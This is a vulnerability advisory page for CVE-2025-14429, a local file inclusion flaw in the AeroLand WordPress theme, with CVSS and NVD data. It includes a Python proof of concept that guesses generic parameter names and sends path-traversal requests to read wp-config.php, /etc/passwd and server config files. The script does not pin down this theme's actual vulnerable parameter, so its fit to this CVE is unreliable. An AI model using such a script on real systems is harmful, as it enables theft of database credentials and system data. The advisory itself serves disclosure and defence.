Security Vulnerability Report
中文
CVE-2025-14429 CVSS 8.1 HIGH

CVE-2025-14429

Published: 2026-01-08 10:15:46
Last Modified: 2026-04-27 17:16:25

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove AeroLand aeroland allows PHP Local File Inclusion.This issue affects AeroLand: from n/a through <= 1.6.6.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:thememove:aeroland:*:*:*:*:*:wordpress:*:* - VULNERABLE
AeroLand主题 <= 1.6.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14429 AeroLand LFI PoC # Target: WordPress with AeroLand theme <= 1.6.6 import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # Common LFI parameters to test lfi_params = ['file', 'page', 'template', 'theme', 'view', 'load'] # Sensitive files to read files_to_check = [ '../../../../wp-config.php', '../../../../../../etc/passwd', '../../../../../etc/apache2/apache2.conf', '../../../../../../var/www/html/wp-config.php' ] def test_lfi(url, param, payload): try: test_url = f"{url}?{param}={payload}" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } response = requests.get(test_url, headers=headers, timeout=10, verify=False) return response.text except Exception as e: return None def main(): print(f"[*] Testing CVE-2025-14429 on {target}") print("=" * 60) for param in lfi_params: for file_path in files_to_check: print(f"\n[>] Testing: {param}={file_path}") result = test_lfi(target, param, file_path) if result: # Check for sensitive content if 'DB_NAME' in result or 'root:' in result or '<?php' in result: print(f"[!] VULNERABLE! Found sensitive data in response") print(result[:500]) return True print("\n[!] No obvious LFI detected with basic payloads") return False if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14429", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:46.200", "lastModified": "2026-04-27T17:16:24.870", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove AeroLand aeroland allows PHP Local File Inclusion.This issue affects AeroLand: from n/a through <= 1.6.6."}, {"lang": "es", "value": "Vulnerabilidad de control inadecuado del nombre de fichero para la declaración include/require en programa PHP ('Inclusión remota de ficheros PHP') en ThemeMove AeroLand aeroland permite la inclusión local de ficheros PHP. Este problema afecta a AeroLand: desde n/a hasta &lt;= 1.6.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thememove:aeroland:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.6.6", "matchCriteriaId": "3F76E498-9A96-4A61-BCF2-AEFC7D735FBD"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/aeroland/vulnerability/wordpress-aeroland-theme-1-6-6-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}